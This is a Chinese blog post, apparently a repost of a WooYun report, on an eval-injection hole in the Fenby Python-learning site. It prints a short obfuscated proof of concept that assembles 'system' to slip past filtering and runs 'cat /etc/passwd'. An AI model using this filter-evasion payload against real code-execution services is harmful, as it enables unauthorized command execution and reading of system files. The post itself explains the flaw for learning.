有意思的python***案例

最新推荐文章于 2023-12-07 08:45:00 发布
最新推荐文章于 2023-12-07 08:45:00 发布
阅读量111 收藏
点赞数
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34405925/article/details/85117524
版权

今天在wooyun里看到一个有意思的漏洞。说它有意思,第一是思路很特别,当然也是因为安全做的很low,第二里面使用的python的poc有个小细节,特此分享一下。


网站叫Fenby网,主要是为了pythoner在线学习的,它有一个在线练习的功能,可以输入代码,然后执行,测试运行结果。。。

于是楼主就注册了一个账号,URL:http://www.fenby.com/course/units/xxxx

然后输入如下一段恶意代码:

import string

s = ["s","y","s","t","e","m"]

s = "".join(s)

cmd = "cat /etc/passwd"

code = "__import__('os')." + s + "('" + cmd + "')"

eval(code)


于是就这样了。。。

wKioL1VN6AWiXCoBAAGITIL72WQ123.jpg

这里我想说两点,第一造成漏洞的原因是没有过滤eval,第二代码里使用的import和__import__的不同。

import其实是调用的__import__但是如果直接写成 code = "__import__('package.module')",它的意思就不是说:import package.module as package

When the name variable is of the form package.module, normally, the top-level package (the name up till the first dot) is returned, not the module named by name.


weixin_34405925
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python好玩的案例-Python有趣的小案例
weixin_37988176的博客
10-29 342
# 所需依赖:python3 pycharm# print 打印print('hello world!')# 注释符号# 井号后面灰色的内容是注释,相当于笔记,会被机器忽略# 变量和值# n 是变量, 100 是值,等号的作用是赋值# n 相当于高中数学的 xyz ,只不过 xyz 的值只能是数字,变量的功能要更强大n = 100m = 'hello'print(n)print(m)# 数据类型,...
python好玩的案例-Python几个有趣和特别的小故事
weixin_37988176的博客
10-30 1289
前言当一门编程语言是开源的时候,往往会有产生一些搞笑和有趣的东西。通常,这意味着社区的贡献者会为该语言添加一些有趣和特别的彩蛋以及隐藏的特性(当然前提是不会增加在生产环境中使用的风险)。Python 就是一个很好的例子。作为一门开源的语言,它的社区为其贡献了一些十分幽默的东西。旁注:如果您想观察彩蛋,请注意,它们只能在第一次工作。如果希望重新运行它们,需要重新启动 Python shell。1、H...
python有意思案例_13个小案例轻松认识python
weixin_42109925的博客
01-13 418
python流行一段时间了,开始的就感觉只是一种新的语言罢了,可是这个世界总是对新事物非常尊崇,平时用的不多,看起来也没多大动力,结合着平时讲VB(信息技术《算法与程序设计》9讲)的套路,用案例简单自学下python,这13个小案例不像网络上的图形处理等那么酷炫,不能做出酷炫的作品,也没有涉及基础的算法,但也是python的基础吧,算下来13个案例,也刚好够一个学期的课时了,难道是巧合吗。一、环境...
Python中那些有意思的经典示例!快看!
wuli1024的博客
06-02 723
练手实例,墙裂推荐!!!
【pyhton案例01】:5个有趣练习
gongdiwudu的专栏
08-28 4086
成为 Python 大师可以在你的职业生涯中打开许多大门,并获得全球一些最好的机会。无论您对 Python 技能的评价如何,从事 Python 项目都是提高技能和建立个人资料的可靠方法。虽然 Python 书籍和 Python 教程很有帮助,但没有什么比亲自动手编写代码更重要的了。我们为初学者列出了几个 Python 项目,供您挑战自己并在 Python 编码方面做得更好。.........
python用easygui制作小游戏:大鱼吃小鱼 源码
03-19
Python编程领域,开发小型游戏是一种非常有趣且实用的学习方式,可以帮助初学者更好地理解编程概念。本项目以“大鱼吃小鱼”为例,利用Python的easygui库创建了一个简单的互动游戏。EasyGUI是一个轻量级的图形用户...
小学数学口算题是一款利用Python开发了一套自动生成小学生口算题的小应用.rar
07-05
其实一开始以为很简单的一个小应用了,结果发现编写起来好多的条件需要判断,不过这也算是一份不错的python复习案例了,几乎把一些常用的python语法都用到了。 目前只实现了单步加减法口算题的生成,配置项实现了...
有趣的python小程序分享
09-21
本文将深入探讨几个有趣的Python小程序案例,旨在激发读者的创造力,并展示Python在实际应用中的魅力。 #### 二、知识点详解 ##### 1. 一句话启动HTTP文件服务器 **应用场景:** 在日常工作中,有时候我们需要...
Python-photomosaic使用ML和相似性搜索从家庭照片中创建有趣的照片拼图GIF和壁画
08-11
Python-photomosaic是一个利用机器学习(ML)和相似性搜索技术来创建有趣照片拼贴的项目。这个库能够帮助用户从自己的家庭照片...对于想要在Python开发和机器学习领域深入学习的人来说,这是一个非常有价值的实践案例
网络爬虫技术讲义 非常有意思的非技术文档
03-15
- **实战案例**:分享具体的攻防实例,帮助理解实际操作中的技巧与策略。 #### 三、爬虫应用难点 - **技术难题**:探讨在实施爬虫过程中可能遇到的技术障碍,如动态加载内容的处理、登录验证机制的破解等。 - **...
绝版!247个Python经典有趣实例,代码齐全可复制,PDF版拿走即用!
Python单行客的博客
02-23 872
绝版!247个Python经典有趣实例,代码齐全可复制,PDF版拿走即用!
42个Python实用小例子[内附200+代码地址]python小程序200例
最新发布
Java癫疯的博客
12-07 2079
42个Python实用小例子[内附200+代码地址]python小程序200例
python基础练习题:简单有趣#270:邪恶代码勋章【难度:1级】--景越Python编程实例训练营,不同难度Python习题,适合自学Python的新手进阶
景越Python编程实例训练营
10-31 686
python基础练习题:简单有趣#270:邪恶代码勋章【难度:1级】: 任务 EvilCode类似于Codewars游戏.你必须解决尽快编程任务.然而,不同于Codewars,EvilCode奖你一枚奖牌,这取决于你把解决任务的时间. 获得金牌,你的时间必须是(严格)不如对应勋章的时间.您可以在所有授予`“金”,"银"或"铜奖"奖章’,或’“无”'奖章.只有一个奖章(最好的实现)获得. 现在给你的...
[Python]Python 使用 for 循环的小例子
weixin_30527323的博客
09-30 123
[Python]Python 使用 for 循环的小例子: In [7]: for i in range(5): ...: print "xxxx" ...: print "yyyy" ...: xxxxyyyyxxxxyyyyxxxxyyyyxxxxyyyyxxxxyyyy 转载于:https://www.cnblogs.com/gaojian/p/7614...
python的for循环
WhaleSong52Herts的博客
03-17 488
‘’’ python的for循环有很多用途,它结构简单,操作灵活,不说太多废话 for循环适用于数据较少的循环,最好在百万级以下,如果到哪个程度,最好选取别的循环方式已达到你的目的。 如numpy的思维去实现。 介绍一下函数的用法: for i in range(10): for与in是语法 range指得是生成从0到10的数,包前不包后,所以输出0-9 i是生成的数 我往往是把i当下标用,用来做...
Python学习(12):循环控制语句(for、while)
梧雨北辰的博客
06-07 616
循环常用的两种操作就是While与for 一、while循环 不同于其他语言的是,python语言中的while可以添加else,处理循环结束的情况 #不同于其他语言,while可以添加else,处理循环结束的情况 counter = 1 while counter <= 10: counter += 1 print("now,counter is " + str(...
Python3 循环语句
学亮编程手记
02-19 444
本文将为大家介绍 Python 循环语句的使用。 Python 中的循环语句有 for 和 while。 Python 循环语句的控制结构图如下所示: while 循环 Python 中 while 语句的一般形式: while 判断条件(condition): 执行语句(statements)…… 执行流程图如下: 执行 Gif 演示: 同样需要注意冒号和缩进。另外,在 ...
python小例子之9 -- for语句的72变
bluecrystal
01-04 98
  主题: for语句的72变  环境: winvista(64)  + sp2 + python2.5备注: 请注意,凡是在源代码文件中使用了中文字符,请最好保存为utf-8格式,以下所有的代码片段实际上前后关联的,最好保存为一个文件来使用 说明: python作为一种动态脚本语言,非常灵活,这篇文章对于常用for ... in ...语句做了个小结,如果你有新的有关for...in....
有意思python算法
05-17
Python是一种简洁、高效且易于学习的编程语言,它在数据结构、算法等方面拥有广泛的应用。在众多的Python算法中,有一些算法非常有意思,以下是其中几个: 1. 蚂蚁走路问题:假设有n只蚂蚁,每只蚂蚁只能向左或向右爬行,并在遇到另一只蚂蚁时改变方向,求最后所有蚂蚁的位置。这个问题看起来很简单,但是却有很多奇妙的数学性质和解法。 2. 石子游戏:给定一个初始状态,两个人轮流取出两端的石子,直到没有石子可取。每个玩家在整个游戏中石子的总和为分数。目标是使自己的分数尽可能高。这个问题可以使用递归或动态规划算法来解决。 3. 最短路径问题:给定一张图和两个节点,求这两个节点之间的最短路径。这个问题是计算机科学中最基本的算法之一,可以使用Dijkstra算法或A*算法等来解决。 4. 反转字符串:将一个字符串从最后一个字符开始反向输出。这个问题看起来很简单,但它可以用多种方式来解决,例如递归、迭代、堆栈等。 这些算法有趣、有挑战性,值得程序员们去尝试实现。通过实践这些算法,不仅可以提高Python编程技能,还可以深入了解计算机科学的基础知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值